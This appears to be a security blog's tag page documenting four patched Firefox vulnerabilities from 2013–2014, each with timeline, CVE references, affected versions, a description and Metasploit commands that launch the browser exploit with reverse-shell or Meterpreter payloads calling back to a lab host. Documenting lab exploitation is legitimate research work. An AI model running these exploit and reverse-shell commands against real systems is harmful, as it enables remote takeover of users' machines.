Posts tagged Mozilla

MFSA-2014-29 Firefox WebIDL Privileged Javascript Injection

Timeline :

Vulnerabilities discovered by Marius Mlynski via TippingPoint’s Pwn2Own contest,
Patched by the vendor via MFSA-2014-29 the 2015–03-18
Metasploit PoC provided the 2014-08-27

PoC provided by :

Marius Mlynski
joev

Reference(s) :

CVE-2014-1510
CVE-2014-1511
MFSA-2014-29

Affected version(s) :

Firefox 22 to 27 included

Tested on :

with Firefox 27 on Windows 7 SP1

Description :

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox’s Javascript APIs.

Commands :

use exploit/multi/browser/firefox_webidl_injection
set PAYLOAD firefox/shell_reverse_tcp
set SRVHOST 192.168.6.138
run

SYSTEMINFO

CVE-2013-1710 Firefox toString console.time Privileged Javascript Injection

Timeline :

Vulnerability discovered by moz_bug_r_a4
Vulnerability reported to the vendor by moz_bug_r_a4 the 2013-05-12
Patched by the vendor the 2013-08-06
Metasploit PoC provided the 2014-08-15

PoC provided by :

moz_bug_r_a4
Cody Crews
joev

Reference(s) :

CVE-2013-1710
MFSA-2013-69

Affected version(s) :

All versions of Mozilla Firefox versions between 15 and 22 included.

Tested on :

Windows 7 SP1 with Mozilla Firefox 22.0

Description :

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome://privileges.

Commands :

use exploit/multi/browser/firefox_tostring_console_injection
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp 
set LHOST 192.168.6.138
exploit

SYSTEMINFO

CVE-2013-0753 Firefox XMLSerializer Use After Free

Timeline :

Vulnerability discovered and reported to ZDI by regenrecht
Vulnerability reported to vendor by ZDI the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-08-23

PoC provided by :

regenrecht
juan vazquez

Reference(s) :

CVE-2013-0753
OSVDB-89021
BID-57209
ZDI-13-006
MFSA-2013-16

Affected version(s) :

All versions of Mozilla Firefox previous version 17.0.2

Tested on :

with Firefox 17.0.1 on Windows XP SP3

Description :

This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_firefox_xmlserializer
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Marius Mlynski the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-05-15

PoC provided by :

Marius Mlynski
joev
sinn3r

Reference(s) :

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s) :

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with :

Firefox 17.0.1

Description :

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the(CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Commands :

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Go to Top